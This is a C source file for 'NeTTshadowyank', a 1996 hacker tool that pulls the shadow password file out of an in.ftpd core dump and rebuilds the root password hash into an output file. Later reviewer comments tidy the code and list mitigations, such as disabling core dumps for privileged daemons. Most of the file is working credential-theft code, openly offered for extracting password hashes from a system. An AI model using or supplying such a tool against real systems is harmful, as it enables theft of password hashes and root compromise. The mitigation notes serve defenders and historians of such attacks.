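/*
 * NeTTshadowyank.c, by NeTTwerk (nettwerk@spyder.org) Oct 17, 1996
 * Released into the Public Domain (not for use with some sets)
 *
 * **NeTTshadowyank** Version 1.0
 * nettwerk@spyder.org
 *
 * NeTTshadowyank is a simple utility which reads a corefile created by
 * in.ftpd, and pulls out the shadow file 8).. it also reconstructs the root
 * password (which is corrupted in the shadow entry buffer), and puts it in
 * the appropriate place in the targetfile 'NeTTshadowyank.shadow'.
 *
 * This is a really brainless program from the perspective that it does very
 * *little* intelligence... Version 2.0, will have my infamous 'heuristics
 * engine' which will *look* for shadow entries/passwd entries in the binary
 * file.
 *
 * (btw: if you dont know *how* to make in.ftpd dump core with the shadow
 * file inside it, tough luck)
 *
 * Greets for this little util go out for BioH,mudge,glyph (all the l0pht
 * guys), bika,k,rommel,hobbit and of course,whoever wrote in.ftpd ;)
 *
 * latah. questions can be sent to nettwerk@spyder.org
 */

/*
 * Review notes:
 *
 * - The header names after each #include were lost when this page was
 *   extracted. The list below is what the code needs; it is not necessarily
 *   the original nine. Elf32_Ehdr comes from <elf.h> on glibc systems; other
 *   platforms may need a different ELF header.
 * - ROOT_OFFSET and SHADOW_OFFSET are fixed byte offsets into one particular
 *   core image. Nothing validates that the input has that layout, so output
 *   from any other file is meaningless.
 * - The input is untrusted binary data. Offsets are checked against the file
 *   size, the buffer carries a trailing NUL, and the scan loop stops at the
 *   end of the buffer.
 * - Both output files hold password-hash material, so the process umask is
 *   tightened before they are created.
 * - The e_type field is read in host byte order; a core from a machine of
 *   the other endianness will print a wrong type value.
 * - What this program depends on is a daemon that still holds shadow data in
 *   memory writing a core file that someone other than root can read
 *   (presumably; the page does not say how the core is obtained). Disabling
 *   core dumps for privileged processes, keeping core files root-only, and
 *   having the daemon close its shadow database after authentication each
 *   remove that dependency.
 */

#include <sys/types.h>
#include <sys/stat.h>

#include <elf.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define ROOT_OFFSET   0xd7d4
#define SHADOW_OFFSET 0xfadb

/*
 * Load the core file named by argv[1], print its ELF identification, then
 * write the text found at SHADOW_OFFSET to 'NeTTshadowyank.scratch' and a
 * line-by-line copy of it, with the root entry rebuilt from the string at
 * ROOT_OFFSET, to 'NeTTshadowyank.shadow'.
 *
 * Returns EXIT_SUCCESS when both files were written, EXIT_FAILURE on any
 * usage, I/O, allocation or bounds error (the original exited 0 everywhere).
 */
int main(int argc, char **argv)
{
    int rc = EXIT_FAILURE;
    int fd = -1;
    char *buf = NULL;
    FILE *scratch = NULL;
    FILE *target = NULL;
    struct stat st;
    Elf32_Ehdr hdr;
    char line[255];
    size_t size;
    size_t got;
    const char *end;
    const char *p;
    const char *root_pw;

    if (argc != 2) {
        printf("[NeTTshadowyank] Usage: %s corefilename\n",
               (argc > 0 && argv[0]) ? argv[0] : "NeTTshadowyank");
        return EXIT_FAILURE;
    }

    /* Output files contain hash material: owner-only for anything we create. */
    umask(077);

    if ((fd = open(argv[1], O_RDONLY)) < 0) {
        perror("Opening Corefile");
        goto out;
    }
    if (fstat(fd, &st) < 0) {
        perror("fstat()'ing file");
        goto out;
    }
    if (st.st_size <= 0 || (uintmax_t)st.st_size >= SIZE_MAX) {
        fprintf(stderr, "[NeTTshadowyank] Unusable corefile size\n");
        goto out;
    }
    size = (size_t)st.st_size;

    /* st_size is off_t, not int: cast explicitly to match the format. */
    printf("[NeTTshadowyank] Loading %s, size %ld bytes\n",
           argv[1], (long)st.st_size);

    /* Both fixed offsets and the ELF header must lie inside the file. */
    if (size < sizeof hdr || size <= ROOT_OFFSET || size <= SHADOW_OFFSET) {
        fprintf(stderr, "[NeTTshadowyank] Corefile too small\n");
        goto out;
    }

    /* One extra zero byte guarantees every string read terminates in-buffer. */
    buf = calloc(1, size + 1);
    if (!buf) {
        printf("Out of Memory\n");
        goto out;
    }

    /* read() may return short counts; unread bytes stay zero. */
    for (got = 0; got < size; ) {
        ssize_t n = read(fd, buf + got, size - got);
        if (n < 0) {
            perror("Reading corefile");
            goto out;
        }
        if (n == 0)
            break;
        got += (size_t)n;
    }

    /* Copy the header out instead of aliasing the byte buffer. */
    memcpy(&hdr, buf, sizeof hdr);

    printf("File Type ->%c%c%c%c\n",
           hdr.e_ident[EI_MAG0], hdr.e_ident[EI_MAG1],
           hdr.e_ident[EI_MAG2], hdr.e_ident[EI_MAG3]);

    printf("File Class->0x%x", hdr.e_ident[EI_CLASS]);
    switch (hdr.e_ident[EI_CLASS]) {
    case 1:  printf(" (32 Bit Binary)\n"); break;
    case 2:  printf(" (64 Bit Binary)\n"); break;
    default: printf(" (BAD Binary)\n");    break;
    }

    printf("File Data ->0x%x", hdr.e_ident[EI_DATA]);
    switch (hdr.e_ident[EI_DATA]) {
    case 1:  printf(" (Least Significant Bit)\n"); break;
    case 2:  printf(" (Most Significant Bit)\n");  break;
    default: printf(" (BAD Binary)\n");            break;
    }

    printf("File Vers ->0x%x\n", hdr.e_ident[EI_VERSION]);

    printf("File Type ->0x%x", hdr.e_type);
    switch (hdr.e_type) {
    case 1:  printf(" (Relocatable Executable)\n");  break;
    case 2:  printf(" (EXEC Executable)\n");         break;
    case 3:  printf(" (Dynamic Executable)\n");      break;
    case 4:  printf(" (Core Dump [Post-Mortem])\n"); break;
    case 5:  printf(" (Numeric Executable)\n");      break;
    default: printf(" (Unknown Binary Format)\n");   break;
    }

    root_pw = buf + ROOT_OFFSET;
    /* The original passed the integer offset to %s, which is undefined. */
    printf("Root Password location (0x%x) ->%s\n",
           (unsigned)ROOT_OFFSET, root_pw);

    printf("Reconstructing shadow file\n");
    if (!(scratch = fopen("NeTTshadowyank.scratch", "w"))) {
        perror("Creating scratch file");
        goto out;
    }

    /*
     * Copy bytes until a "lic_key" marker or '#', turning NULs into spaces.
     * The walk is bounded by the buffer end; the original ran until it
     * happened to meet a terminator.
     */
    end = buf + size;
    for (p = buf + SHADOW_OFFSET; p < end; p++) {
        if ((size_t)(end - p) >= 7 && memcmp(p, "lic_key", 7) == 0)
            break;
        if (*p == '#')
            break;
        fputc(*p == '\0' ? ' ' : *p, scratch);
    }
    if (ferror(scratch)) {
        perror("Writing scratch file");
        goto out;
    }
    if (fclose(scratch) != 0) {
        scratch = NULL;
        perror("Writing scratch file");
        goto out;
    }

    if (!(scratch = fopen("NeTTshadowyank.scratch", "r"))) {
        perror("Opening Scratch File");
        goto out;
    }
    if (!(target = fopen("NeTTshadowyank.shadow", "w"))) {
        perror("Creating target file");
        goto out;
    }

    while (fgets(line, sizeof line, scratch)) {
        /* Strip the newline only if present; never index line[-1]. */
        line[strcspn(line, "\n")] = '\0';

        /* Match the whole user field so "rooter:" is not rewritten. */
        if (strncmp(line, "root:", 5) == 0) {
            printf("[NeTTshadowyank] Repairing Root Shadow Entry\n");
            fprintf(target, "root:%s:0::::::\n", root_pw);
        } else {
            fprintf(target, "%s\n", line);
        }
    }
    if (ferror(scratch) || ferror(target)) {
        perror("Copying shadow entries");
        goto out;
    }
    if (fclose(target) != 0) {
        target = NULL;
        perror("Writing target file");
        goto out;
    }
    target = NULL;
    rc = EXIT_SUCCESS;

out:
    if (target)
        fclose(target);
    if (scratch)
        fclose(scratch);
    free(buf);
    if (fd >= 0)
        close(fd);
    return rc;
}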